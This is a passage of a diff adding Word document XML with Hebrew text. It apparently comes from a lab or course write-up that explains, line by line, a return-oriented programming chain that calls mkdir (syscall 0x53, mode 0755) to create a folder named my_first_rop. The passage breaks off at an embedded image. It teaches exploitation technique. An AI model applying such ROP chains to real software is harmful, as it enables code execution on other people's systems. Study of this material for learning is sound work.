+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ובעזרת מה ששמור ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>r15</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נוכל לגשת לכתובת של שם התיקייה.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו תכיל את הכתובת של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>add %r15, %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, על מנת ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכיל את הכתובת של התיקייה החדשה.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שנרצה להגיע אליה מ-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו תכיל את ההרשאות שנרצה עבור הקובץ </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(0x01ed=0755)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> על מנת שכשנעשה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הערך שייכנס ל-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הוא ההרשאות שאמורות להיות בו לפני שנקרא ל-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>שורה זו מכילה ערך זבל שיצא מהמחסנית ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %r15”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שנרצה להגיע </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>מ-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>שורה זו מכילה את מספר ה-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> עבור יצירת תיקייה חדשה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(0x53=83)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שנרצה שייכנס ל-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו מכילה את הכתובת של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3 שכאשר:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0x53</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0x1ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = address of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>my_first_rop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">תפתח את התיקייה החדשה בשם </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>my_first_rop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> עם ההרשאות </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0755</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> תחת התיקייה הנוכחית.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="cs"/>
+          <w:noProof/>
+          <w:rtl/>
+          <w:lang w:val="he-IL"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D53805" wp14:editId="5B5BD7DB">
+            <wp:extent cx="4628616" cy="1711757"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name="Picture 1"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
